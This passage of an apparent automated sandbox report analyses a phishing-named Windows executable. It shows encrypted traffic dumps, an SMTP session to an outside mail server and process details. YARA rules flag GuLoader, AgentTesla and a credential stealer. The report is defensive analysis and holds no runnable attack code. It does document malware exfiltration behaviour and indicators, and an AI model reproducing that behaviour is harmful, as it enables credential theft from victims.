87 d3 f9 18 87 6f 1c 8e 74 49 e7 e2
                                                                        Data Ascii: -R<Qdd0t~%@1}u&h+[y9K[-B&g!r6dF=B;Db%Lyjgf.8/B``:8?_sV1DCX1\O;Gz&zFM>OWMDA+Dz'kw*\bi\)`M}YPw+CotI
                                                                        2021-09-28 06:15:57 UTC203INData Raw: c4 9c 25 9b f3 f1 4a 9d 8d d6 5b 3c 40 ec c5 60 92 dd 87 6e 89 45 e1 4d 73 73 9a 26 ed 7a f0 08 8d 8a 47 be ce 22 00 8e 66 52 9e dd de f2 fa 0e dd b6 a5 33 b2 9b d7 1a 58 c9 b2 79 5c be 23 96 74 bb 2d 01 63 b8 e8 24 2b fd 5e df 1b 3b b3 ef fe 09 f5 6e 6e 32 1b 48 82 9a 0e c2 52 ea a0 0b f2 0c ec 74 28 da 4a a5 04 73 4f f0 0d 1e 69 01 b1 1c fa 22 78 fd 1e 16 77 ba 54 6d 2f 92 aa 8c 69 6d 79 51 1b 1d 00 f5 a7 ac c7 83 6a 23 94 ed 73 f0 bb 65 54 2f fd 17 2c 82 da db e3 4f dc e9 e4 68 26 73 4d ac 0e 32 98 b4 99 37 b9 e9 de 0c 4f 69 8a 86 2f 76 b9 6e 21 6a 01 d9 0b 85 aa 2c 1b 9e 6e d9 fe 1f ad 15 19 a5 1c 70 22 cc f6 34 7c c9 ab 08 e5 90 34 d0 ee 60 3f c7 0a f1 fd 9e 5d 23 76 5b a2 a2 be 8e 8c 96 1e 49 57 28 b0 da a3 d7 89 b8 43 e3 85 14 84 25 40 94 a5 a8 b4
                                                                        Data Ascii: %J[<@`nEMss&zG"fR3Xy\#t-c$+^;nn2HRt(JsOi"xwTm/imyQj#seT/,Oh&sM27Oi/vn!j,np"4|4`?]#v[IW(C%@
                                                                        2021-09-28 06:15:57 UTC204INData Raw: 2d 14 76 59 5b 88 9d fa af 41 ec cf f6 d6 c9 f4 92 b3 b6 53 9d 91 19 e2 12 a6 70 7b f2 d1 14 7b b5 4f 46 b2 eb 22 7d dd 53 57 3d b9 b9 8d bc 5d eb ab db cf 72 41 cf 2c 29 58 24 e2 77 41 39 41 ef 45 65 5c 4c 4c 9b ac 1e 45 f1 50 fd 5e a9 c2 a0 dc 5a 7c 24 24 91 db e8 29 a6 53 1b 96 45 45 f8 c2 ad 9c 01 9f 6f 0c 2d 42 76 64 fc 4c 1c 22 3a df 44 1a 4e 11 48 a1 16 00 72 27 47 22 2d 4f 0f 5c 5d ae 73 43 a3 8b 7a 6b 27 a9 bf 9f 54 18 09 c7 21 07 23 63 af 7f e3 85 bc 39 30 4c 5e 90 18 cb 74 69 73 85 c3 a8 68 10 35 9a 9b e5 39 90 76 ed f7 31 bf cb 11 28 b5 24 ad c9 39 91 a2 88 65 67 e6 c4 e1 88 1f 09 6d 1d 99 28 03 5c 6a c1 8a 82 47 89 75 37 e7 5e bb d0 ea fc b2 db ce 82 d3 e6 ce 32 a3 39 ba cf 91 5d ef d5 db d4 78 46 c2 98 f0 b4 4e 2d 62 4c 8f 02 1c 73 f7 00 c5
                                                                        Data Ascii: -vY[ASp{{OF"}SW=]rA,)X$wA9AEe\LLEP^Z|$$)SEEo-BvdL":DNHr'G"-O\]sCzk'T!#c90L^tish59v1($9egm(\jGu7^29]xFN-bLs
                                                                        2021-09-28 06:15:57 UTC205INData Raw: 61 d7 fb d4 2b 08 7b 53 ba 47 1b 9b af da 1c ad f7 d9 79 7a 69 b7 a1 24 78 de 4d 0d 68 07 e0 0a 92 ab 36 74 a3 5e c4 ec 15 c0 7c 28 b8 27 70 22 cc 9f 09 67 ee b1 07 e7 f5 2f d0 f0 79 3b d9 10 8b fb 8f 40 13 79 76 ba a5 bf ed 9a 97 3c 41 44 25 b4 c5 b6 c6 92 a4 2d d9 8e 06 b4 44 67 8d a9 b6 a2 2e 01 04 70 ba 93 7f b6 c1 26 54 b0 ac 01 dc 14 2e 9e 5f 47 71 58 c4 53 0c 28 f9 bb 1f 3f 2c 1f 96 c7 5e a9 4c 43 2b 7d b8 37 47 0c 61 77 05 ca 6f ca 66 35 95 be 30 03 17 05 99 4b 3a 01 f5 db b7 0e c1 cb 58 4a 31 2c a1 45 86 d7 bb d1 28 7a c8 b0 b2 39 44 68 e6 d2 1b ee 10 f7 e4 a5 a2 90 18 db ab f8 3b ff 1f 72 3f ad 40 01 81 c3 fb 6f 0b 35 0d c0 03 00 4f 4c 38 62 cd b5 12 2c d2 7f f7 77 fb 9b bf 13 97 23 9f 4b f8 01 77 fa e2 24 cc 07 04 d6 f8 f2 8e 65 00 b1 6e 20 74
                                                                        Data Ascii: a+{SGyzi$xMh6t^|('p"g/y;@yv<AD%-Dg.p&T._GqXS(?,^LC+}7Gawof50K:XJ1,E(z9Dh;r?@o5OL8b,w#Kw$en t
                                                                        2021-09-28 06:15:57 UTC207INData Raw: 38 5c b1 09 f7 52 79 60 9a ef b5 1d 3d 33 ff bd f4 28 96 70 ef f7 0b a0 ca 10 2e b5 33 a6 cc 1c bb af 99 45 67 94 86 cd 81 25 13 5e 7e b7 24 17 7b 1e ee bd a3 4a 8b 01 14 e7 49 96 e1 f5 fd c0 99 cf 83 aa d5 c9 77 89 29 c8 f3 92 29 a9 f2 b3 e1 6e 27 ee b8 84 b4 4f 59 00 7c e0 2b 18 77 f5 1c ac cd 33 74 45 86 6e 91 82 e3 2e a8 7b 26 24 3c 1f ee 57 42 0e a6 a3 20 8b f8 aa 7a 71 7c 6e c8 27 d5 14 af bf e4 66 40 1d e5 a7 6a 96 84 7f 66 65 27 40 b6 a9 a1 95 44 4f 44 ba bd e2 7d 6d de d8 57 9c 46 bf 97 e1 0a ac 34 07 02 c6 89 57 81 e5 ea 7b ed b0 d1 41 3c 61 fd c1 68 b4 cb a7 67 b3 55 fd 7a 68 04 bc 52 fe 6f d3 32 bc b0 4b a9 cf 0c 16 83 22 65 84 df 90 fa fb 1f ce 9e ba 33 f9 99 cb 2a 68 f6 b3 0a 7b d1 33 98 65 90 36 06 65 b8 8c 02 1f e1 3b f9 11 55 84 e9 9f 21
                                                                        Data Ascii: 8\Ry`=3(p.3Eg%^~${JIw))n'OY|+w3tEn.{&$<WB zq|n'f@jfe'@DOD}mWF4W{A<ahgUzhRo2K"e3*h{3e6e;U!
                                                                        2021-09-28 06:15:57 UTC208INData Raw: 25 39 0d f5 ed 8a 05 c7 ce 68 51 2e 25 c0 50 86 ec 86 f8 2c 69 dd 9f be 3e 4e 68 f1 ce 16 e7 38 e0 fe c0 be 93 47 f9 bf f9 05 c0 03 65 25 c8 5c 02 de cd f0 7e 39 35 1e de 0f 1a 42 1c 2d 68 da 8f 11 2d bb 59 d5 5f eb 86 cd 05 81 24 c0 5c ef 1c 47 c9 ef 34 c7 62 24 dc 8b f5 8e 7c 71 a3 6f 27 73 c7 9d 0d ee 13 c0 d3 c7 2a 7c 42 bb 7d 30 a7 e9 5e b7 80 db cb 03 ea f1 c9 11 6c 7c 66 ea 23 c9 1a a9 06 5b 6b b1 57 cb 29 59 61 4c a4 2e 07 09 f4 53 6b 0c 72 0a e0 87 5f 09 85 8b 1a 50 e4 80 92 55 20 d3 d0 4d 7f f8 ab 2f 83 1c 28 6d 46 53 82 9f fc 8e 63 ec cf fc af 9a d7 8f 8f a1 6f 8e 87 0e f3 3a 84 70 7b f8 a8 47 53 b3 50 73 b4 c1 28 76 b2 73 32 3d b5 be a6 80 51 d6 bb d1 c5 4f 24 ee 3f 44 7a 32 b1 56 4b 58 76 f4 31 4c 54 4c 42 a4 c2 23 52 94 43 e6 2a a4 ca a0 f2
                                                                        Data Ascii: %9hQ.%P,i>Nh8Ge%\~95B-h-Y_$\G4b$|qo's*|B}0^l|f#[kW)YaL.Skr_PU M/(mFSco:p{GSPs(vs2=QO$?Dz2VKXv1LTLB#RC*
                                                                        2021-09-28 06:15:57 UTC209INData Raw: a0 92 d2 b8 58 d5 e1 b4 1e 8a 83 7d 58 9a 7f 71 bc fe 77 f2 8a 94 04 9e de ad 24 bc d2 98 31 c6 d5 a9 f4 0a de 27 b8 0a 14 19 f1 2e 82 18 a4 54 df ff 2b d0 b2 6c 65 f5 23 33 e7 b6 d9 97 8d 27 8a f2 c9 46 eb 9b a0 4d 30 b7 d2 6b 8e d0 4e ef 90 ca 70 67 18 de 0d 42 4e 12 4f 98 54 3b e2 01 f3 48 ba 6e 39 dc 0a 0b cd 9a 5b 2c 47 a6 ef 0a ad 6d 82 24 49 aa 2c d1 6b 78 08 9f 7c 6a 21 6a b1 7c 98 2f 1f 92 1c 78 15 b2 34 02 2e f9 c8 89 0e 09 03 1f 7a 7c 61 9d af eb b7 f0 68 54 b2 90 7e 9d c5 3e 5f 4d 92 17 78 8e b9 b7 86 1b a0 ea 85 63 67 1e 3c db c6 79 ec 5a bc 7c c4 83 aa 79 20 1e 42 cd 4c 39 b9 39 c9 2f 6d 8f 6c f5 c8 c4 5d e1 a6 9e 90 70 ac 40 fd f4 58 94 7d bb 98 59 1c 8e c3 6e 88 8d 69 bb 92 0e 5e af 6d 85 92 e4 3c 40 1f 16 de 45 e4 93 fa e2 ed 19 2b 4a dd
                                                                        Data Ascii: X}Xqw$1'.T+le#3'FM0kNpgBNOT;Hn9[,Gm$I,kx|j!j|/x4.z|ahT~>_Mxcg<yZ|y BL99/ml]p@X}Yni^m<@E+J
                                                                        2021-09-28 06:15:57 UTC210INData Raw: 41 b5 a4 ca 83 0a 47 9f f9 71 58 3c 33 00 2a 9d c4 e3 13 99 68 2c 0a 51 43 14 c3 13 62 6f e2 48 df 8e 3d 77 5d 63 98 59 2b 77 c7 ee e8 7c 8d c1 06 0d 9c 9f 8e 50 26 fb cb df 35 49 3c 7c f7 55 4b e1 d5 38 0a 03 2b 20 b1 da a4 d4 48 2f 5b cd a6 a0 7b 0d c3 ca 6d e1 5d d9 fe 94 06 ca 02 65 04 a6 94 45 9b 92 f7 36 f4 cd ca 27 55 35 e0 a3 56 c3 c0 e7 6b d0 49 8a 60 0e 6d e6 4f 98 76 96 3e cc 8b 3c b1 b4 67 6b f9 2c 33 e7 a1 b7 87 f6 68 eb e5 a0 55 90 ec c7 4c 5e ac b5 6b 66 c3 c1 bd 03 a6 6c 00 04 91 9e ca fd 8e 50 88 65 ba 55 81 ec cc da 7f aa 64 13 1b ff 1b d0 ac 40 23 8f 0d b1 62 8f 15 c8 01 29 e4 79 f2 95 9e 73 6a 28 7c 30 e4 94 37 08 13 5a 76 16 b4 32 0a 3a e5 44 c8 0d 06 03 0c 5b 53 65 9b b4 e5 b9 e3 1e 44 d2 a2 16 94 cb 2c 30 43 93 02 78 6a fb b4 89 08
                                                                        Data Ascii: AGqX<3*h,QCboH=w]cY+w|P&5I<|UK8+ H/[{m]eE6'U5VkI`mOv><gk,3hUL^kflPeUd@#b)ysj(|07Zv2:D[SeD,0Cxj
                                                                        2021-09-28 06:15:57 UTC211INData Raw: 5e 91 31 98 67 aa a6 9b 45 a3 67 6a a0 ea 03 fe 0c 5a fe 18 2d 01 95 f6 78 84 13 9a a1 84 5f 12 3b e6 8d 7c c8 97 24 d3 85 84 8d 78 94 84 a0 53 03 15 33 90 44 bf 7f d9 78 3f 6e fb 18 b9 55 28 07 9d c4 50 45 f9 9e 29 04 78 06 72 fd f1 27 78 c6 dc 78 23 80 eb 12 88 6b aa ae 0c 8c be ce 53 9f 42 41 19 2a 2c f1 e3 8c f6 2e 82 a8 82 d6 9b 80 67 da ca 3a f7 f5 68 16 c3 da 08 14 83 d3 5a 11 de 34 32 46 32 41 0f ba 29 47 54 cc c3 da e2 20 96 c1 ae b5 26 2a a4 4e 43 31 46 b9 00 58 56 3d 86 39 04 27 4b 00 cc 42 b2 26 9c 2a 94 2f c6 b1 b2 f8 33 15 42 40 fa ab 83 5a dc 16 79 f8 3d 28 82 89 cb f8 ee b7 10 6a 51 23 18 79 a7 34 74 7a 56 a2 21 77 39 70 3e d2 6a 0e 3a 43 37 45 46 20 69 5a 32 ad 58 00 d7 f6 8a 3a 0e ea de e5 35 78 88 ff 48 49 4b 0a ce 10 e0 cc ce 5f 59 28
                                                                        Data Ascii: ^1gEgjZ-x_;|$xS3Dx?nU(PE)xr'xx#kSBA*,.g:hZ42F2A)GT &*NC1FXV=9'KB&*/3B@Zy=(jQ#y4tzV!w9p>j:C7EF iZ2X:5xHIK_Y(
                                                                        2021-09-28 06:15:57 UTC212INData Raw: 07 cc 45 ef 90 8f 6c 00 1e d1 82 43 56 93 5d 8c f6 f2 ec 91 7c 80 86 6b 0b 5d 09 8e 7c 97 49 ae 47 b0 4e 92 b0 71 00 44 47 a6 21 fd 07 73 63 9f 1a 67 54 6e df 7d e6 22 08 95 16 7b 05 bf 2d 07 33 e5 47 39 13 0d 1f 67 40 f2 c7 9d 87 e7 ab ec 1c c4 06 89 17 96 c5 29 27 4c 8f 12 7b 69 66 a4 80 0f bc 92 8e 75 65 07 24 d5 5a 59 ec 5b 25 66 a5 98 af 7e 3d 0e cd f5 4c 04 bc 3b 4f 00 71 9d ef 6e d8 4b 61 e2 a6 2e 99 7e a3 5a 61 df 42 1c 50 be 8a 49 93 19 c4 60 84 10 e7 9e 9c 24 5e 9b 63 ba 9c d8 34 7f 18 26 cc f1 d1 b8 ff c4 6c 18 36 7d d9 e1 c2 e1 e0 94 2d ee eb 37 eb 63 03 bc c8 90 c1 02 65 1e 11 83 f2 5e d3 f8 43 68 c3 e3 44 e2 77 10 fa 68 35 72 39 e2 32 34 4d db de 3a 4c 74 50 bf a2 76 c8 59 2c 3b 0e db 7a 42 62 65 10 06 a7 6d a4 7a 76 90 df 29 70 7c 46 9a 25
                                                                        Data Ascii: ElCV]|k]|IGNqDG!scgTn}"{-3G9g@)'L{ifue$ZY[%f~=L;OqnKa.~ZaBPI`$^c4&l6}-7ce^ChDwh5r924M:LtPvY,;zBbemzv)p|F%
                                                                        2021-09-28 06:15:57 UTC214INData Raw: 03 b3 15 35 8e 32 04 20 44 0d da c2 6a 2b 9c 26 9c 2b c8 b3 a8 91 3f 13 55 4d fc be 83 4f d5 1a 71 f2 2e 2e 84 8f d4 ee 67 ef 0f ec c0 2c 0a 79 b5 34 66 69 5a b7 27 77 21 7e 34 d3 6a 08 37 44 33 56 55 09 7c 38 3a bc dc b9 d6 f6 89 2b 1c d8 5d 72 3a 78 88 ca 40 7b c9 06 d2 8e f6 d4 4d 45 43 b9 7b c6 14 a0 1b 1e 11 70 0d df 48 53 55 7c ef 97 7c d4 0a 0d 9c 40 c9 9f 7f 48 36 6b c6 81 5a d7 d9 ee b4 8a 95 d6 29 a6 59 6f 9e 84 d5 53 e6 4f 0c c1 e3 df 21 92 7b 42 ef 37 e1 85 80 87 d2 5a cc ff c1 cc b5 2f e9 43 aa 8b e0 5c b9 bb c5 93 03 45 80 ea f5 d9 3a 25 0e 31 81 58 60 1c 8f 75 a2 a2 5c 07 1c cb 0f ed f8 eb 40 c3 07 5b 73 58 78 88 d6 bc 6a c0 7d 29 f0 9e 4e 91 1e 0f 83 db 5f a9 6c d6 c3 a6 88 72 7b 8c dc 12 ec c9 b7 a9 33 45 3f cd da 4c 5f 20 2f b3 9f da a0
                                                                        Data Ascii: 52 Dj+&+?UMOq..g,y4fiZ'w!~4j7D3VU|8:+]r:x@{MEC{pHSU||@H6kZ)YoSO!{B7Z/C\E:%1X`u\@[sXxj})N_lr{3E?L_ /
                                                                        2021-09-28 06:15:57 UTC215INData Raw: 07 4b b9 e1 82 9e e4 3a 59 09 90 7d c6 df 80 f6 f4 69 2e 24 c5 44 a8 ca ab e6 f7 2c b8 6a ef e8 2f 04 fd c0 c5 c4 56 60 5a 19 c0 f4 12 d1 b3 5e 23 cb e5 43 a5 62 53 7b a3 34 33 b8 f6 27 73 cc 14 df 7f cd 6c 45 f4 23 b5 c9 2d 3e d8 4a bb 74 28 6c 15 02 e1 3e 0b b1 00 f7 bd dc 4d 7e 19 4e eb 20 42 7a ec ae ca e1 e0 af 06 2b 40 52 dc 2a e6 84 cb 3a 0d 11 b4 f4 ca 44 2a 74 ad ae 65 0a c8 95 92 d2 50 a7 1b b2 c0 82 6c b9 78 90 18 cb 3d 7c 8f 97 99 12 5a c2 4a bc 74 ed 06 01 4f 10 ab cd 64 57 cf 33 af 3c bf fa c5 6b e1 58 97 31 98 7d 20 bc 82 4e ac 1b 79 b7 91 87 eb 10 4d 89 17 41 0e b5 f6 6b ee 0f 9b 23 cc 51 17 2b ea 0f 67 4b ac 38 4d cd 8b e1 6f 93 87 9d 57 08 1a b5 c9 4a 99 7e c7 60 a2 be f4 04 b8 51 37 15 02 c4 7d 50 6b 8e 31 8f e7 07 61 61 b4 34 73 cf c9
                                                                        Data Ascii: K:Y}i.$D,j/V`Z^#CbS{43'slE#->Jt(l>M~N Bz+@R*:D*tePlx=|ZJtOdW3<kX1} NyMAk#Q+gK8MoWJ~`Q7}Pk1aa4s
                                                                        2021-09-28 06:15:57 UTC216INData Raw: 1a 80 9b 42 de 88 ec c2 25 11 36 e7 4b b1 96 e4 5d a8 a1 ca 10 8a 5f 8d ff f2 de 21 25 08 22 9e c5 ca 1a 9b 62 b0 a0 5c 1c 12 d1 06 eb fe eb 55 c9 12 68 f4 fb 69 87 46 a5 cf d6 fc 68 eb 87 cb 28 1e 1f 09 8f 45 aa 7f d6 c5 b6 01 3a 75 ed c9 0c ea c6 2a 15 0d 5f 30 d0 cf ca c3 29 33 3a d7 c7 b7 32 1d a4 d0 0a f9 33 cd 8b 9b 61 c5 65 7f 65 bc f4 50 f1 9d 9b 39 98 cd 23 c4 16 20 9e a4 2d 50 30 f4 10 43 60 80 07 00 16 99 2e 84 02 81 45 5f a2 26 ca d7 7b e5 43 2c 20 ec bb d6 87 f6 72 9f f9 c1 4f f1 f6 ab 7e 35 bf c4 7b 04 d1 45 f5 09 c1 76 61 06 de 0c ff 55 b3 5c 9c 65 b8 61 91 7d d8 96 6f 2b 5e 1b 0e ed 9b 49 ad 52 a2 cf 07 b0 63 82 04 49 a8 2d f1 6b 73 0c 9f 73 67 3b 66 a3 fd 21 2c 12 82 16 68 1d aa 38 14 28 fa d4 0d 3a 15 08 16 4a 6b 7b 9f a5 e7 a8 ff 08 4e
                                                                        Data Ascii: B%6K]_!%"b\UhiFh(E:u*_0)3:23aeeP9# -P0C`.E_&{C, rO~5{EvaU\ea}o+^IRcI-kssg;f!,h8(:Jk{N
                                                                        2021-09-28 06:15:57 UTC217INData Raw: 1c 48 0c a0 c1 e0 66 d5 16 a5 34 8d 7f 21 78 ed 70 9d 2e 8f f5 c4 a9 06 95 b2 65 71 b8 fd 8b e9 03 df 25 17 41 0e b2 d4 7b 9d 19 98 23 58 55 30 2d f5 1d f5 1f 88 a9 17 82 9c 88 73 99 8b b7 51 0e 0b 34 9a 5e 38 4a d2 52 20 69 e1 94 55 40 34 10 04 c6 5d 42 69 1a ba 0f 6c 86 9f e2 fa 34 6f 5a 3f 7a bf 70 ec 83 9d d2 b7 a0 9d e1 9f c6 47 02 fa 45 16 b6 dd e2 fe 8c e8 23 8c 20 60 c3 88 10 7f e2 d6 bc 1b fc 7d 93 4a d1 05 13 89 d9 43 34 d7 2d 2a c8 a9 57 12 b7 33 d6 2f c1 c8 d5 f8 35 83 c1 bb bd 37 39 a9 42 41 39 49 ac 17 38 5e 13 8f 30 18 ae a0 0a d9 c5 76 2d 89 27 8e ab b3 ad a5 96 26 17 4d 47 f3 b4 84 4f d6 3c 78 f5 2a 2d 8b 82 c9 f4 69 e8 9c 18 44 28 0c 61 bb 28 75 62 5e af 09 7d 3d 7a 36 c0 63 09 2e 41 3b 59 db fb 71 39 26 a7 54 28 dd c4 0a 6a 19 d8 5c 07
                                                                        Data Ascii: Hf4!xp.eq%A{#XU0-sQ4^8JR iU@4]Bil4oZ?zpGE# `}JC4-*W3/579BA9I8^0v-'&MGO<x*-iD(a(ub^}=z6c.A;Yq9&T(j\
                                                                        2021-09-28 06:15:57 UTC219INData Raw: df 90 9f 7a 90 73 c8 41 fe fc b3 5b 25 d7 d6 59 0c cc 45 e0 14 d2 7b 74 13 c6 8b 4d 41 96 43 98 7a 33 f8 88 f4 4d 99 6b 25 4c 9f 0b ff 1e 40 a6 55 a4 c1 19 30 fe 84 0c 54 ad 27 f9 6c 70 11 9a 60 62 2f 07 b9 7a 96 3f 1f 80 9a 78 10 b2 37 01 32 f2 d7 0e 1f 00 14 09 5e 6e 63 87 a2 f8 af ff 08 5b d2 9f 12 88 dd 31 3f 54 97 0a 6f e3 ad de 8b 06 b6 92 8e 75 65 07 24 d4 42 41 fb c9 9e 73 d1 80 b7 7c 20 09 de ed 5b 98 a9 3a cc 17 76 e6 60 f7 dc 58 71 ed 22 aa 9d 6d a8 4f 79 cc 4f 40 57 99 82 5e 0f 85 d8 6b 96 82 e6 b5 81 0c 43 ae 7f 99 1c 4a 26 cc b8 00 4d cc cd 92 e3 ef 70 3c 2a 56 b0 b2 43 a3 f2 57 d1 b6 f9 f3 e3 38 06 e9 49 d0 d3 ca 6d 5a 0c cd ee 00 ba a8 5f 3b df b1 58 af 6b 5c e6 27 29 3c 3b a3 23 e0 e8 8c cb 7c cf d1 52 e8 ac 20 dd 29 ad fc 0f ad 6b a5 9f
                                                                        Data Ascii: zsA[%YE{tMACz3Mk%L@U0T'lp`b/z?x72^nc[1?Toue$BAs| [:v`Xq"mOyO@W^kCJ&Mp<*VCW8ImZ_;Xk\')<;#|R )k
                                                                        2021-09-28 06:15:57 UTC220INData Raw: 4d d2 f2 28 86 c9 be bd 36 24 ac 45 44 39 48 b0 12 30 58 33 8e 59 0a 2e cc 05 de c2 6b 28 94 22 9c 2a c6 b0 a0 91 3b 13 45 43 f4 b6 8d c7 d2 1c 79 fc 20 26 8c 87 c3 e9 6c fa 1d 6d 59 2d 04 65 bb 29 68 67 54 3a 29 7f 3c d0 bc cd 64 ac 31 44 33 4b 5b 2e 7b 33 2f ae 5d 70 54 e7 08 81 08 ca dc eb 3b 6a 09 8a 4e 69 4a bb c2 39 e3 c6 ce 0a 51 6b 3b 8b 7d fe 06 55 03 a3 ac 89 68 1a 47 b0 fa df 5c 8a 18 c7 85 06 cf f9 7e 15 b5 76 c8 a8 5d 65 c8 13 cb 13 94 c5 a8 e6 4c 7d 1f 1d d4 41 67 0f 1e ac fe d1 33 fb 75 6f 82 2a e4 98 85 89 c0 df 8c f1 d3 a4 bd 32 e7 4a ba 8a e2 5d a9 a6 db 93 0b 46 8a af f0 d5 3d 2c 00 69 8f 24 6e 60 87 2e ac c3 56 6c 1a b3 01 aa f6 8d 5d ab 0f 16 74 53 6d 9a 57 01 6b d6 fc 69 e5 d8 cf 7a 1f 7c 02 f5 42 d4 62 a6 cd d5 09 46 69 8c d4 60 e2
                                                                        Data Ascii: M(6$ED9H0X3Y.k("*;ECy &lmY-e)hgT:)<d1D3K[.{3/]pT;jNiJ9Qk;}UhG\~v]eL}Ag3uo*2J]F=,i$n`.Vl]tSmWkiz|BbFi`
                                                                        2021-09-28 06:15:57 UTC221INData Raw: d1 4a 15 50 bf 9f 5b 12 80 c5 6e 8a 90 67 b5 9c 09 5e ab 63 8b 9c ea 34 4c 18 12 cc c4 d1 8e ff f3 6c 20 36 44 d9 a0 c2 a3 e0 d7 2d aa eb 72 eb 25 03 fb c8 d8 c1 4b 65 54 11 c8 f2 12 d3 b5 43 26 c3 ac 44 b2 77 41 fa 3a 35 21 39 b6 32 61 4d 8d de 6d 4c 2c 50 e6 a2 2c c8 38 2c 59 0e b8 7a 26 62 00 10 60 a7 0a a4 12 76 f9 df 43 70 17 46 f6 25 5e 68 81 b2 d8 60 a0 a7 1b 25 5c 5c c0 37 e3 98 d9 bb 4d 19 bc fc d7 4a 37 68 a0 bb 77 8b 51 94 87 c0 d1 e3 18 bc ce 8c 64 ac 6a 11 5c c8 33 72 81 84 9e 1b 48 40 7f b2 66 6e 3b 1c 4a 0d ae d0 11 5c d2 3a a7 36 9f df fb 76 e4 50 9f 2c 9d 75 28 bb 86 40 be 62 77 a5 f8 81 eb 11 5f f0 0a 44 06 b5 f4 79 97 13 89 a0 89 5f 10 2e f4 0f 75 ca 99 2a ce 80 99 88 71 93 81 bd 56 09 08 36 98 4c b9 7f db 72 22 6b f3 14 b9 50 29 15 1f
                                                                        Data Ascii: JP[ng^c4Ll 6D-r%KeTC&DwA:5!92aMmL,P,8,Yz&b`vCpF%^h`%\\7MJ7hwQdj\3rH@fn;J\:6vP,u(@bw_Dy_.u*qV6Lr"kP)


                                                                        SMTP Packets

                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                        Sep 28, 2021 08:17:32.743431091 CEST5874983278.128.8.31192.168.11.20220-srvr.laprimeracloud08.com ESMTP Exim 4.94.2 #2 Tue, 28 Sep 2021 08:17:32 +0200
                                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                                        220 and/or bulk e-mail.
                                                                        Sep 28, 2021 08:17:32.743802071 CEST49832587192.168.11.2078.128.8.31EHLO 579569
                                                                        Sep 28, 2021 08:17:32.788261890 CEST5874983278.128.8.31192.168.11.20250-srvr.laprimeracloud08.com Hello 579569 [84.17.52.54]
                                                                        250-SIZE 52428800
                                                                        250-8BITMIME
                                                                        250-PIPELINING
                                                                        250-PIPE_CONNECT
                                                                        250-AUTH PLAIN LOGIN
                                                                        250-STARTTLS
                                                                        250 HELP
                                                                        Sep 28, 2021 08:17:32.788522959 CEST49832587192.168.11.2078.128.8.31STARTTLS
                                                                        Sep 28, 2021 08:17:32.836695910 CEST5874983278.128.8.31192.168.11.20220 TLS go ahead

                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Start time:08:15:10
                                                                        Start date:28/09/2021
                                                                        Path:C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exe'
                                                                        Imagebase:0x400000
                                                                        File size:90112 bytes
                                                                        MD5 hash:2FCA7A3E51417EE2E8AEFAFEDE0847D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Visual Basic
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.111975137520.00000000023A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Start time:08:15:32
                                                                        Start date:28/09/2021
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\Hesap Hareketleri 28-09-2021.exe'
                                                                        Imagebase:0x20000
                                                                        File size:65440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.116546085620.000000001D611000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Start time:08:15:33
                                                                        Start date:28/09/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6f82a0000
                                                                        File size:875008 bytes
                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >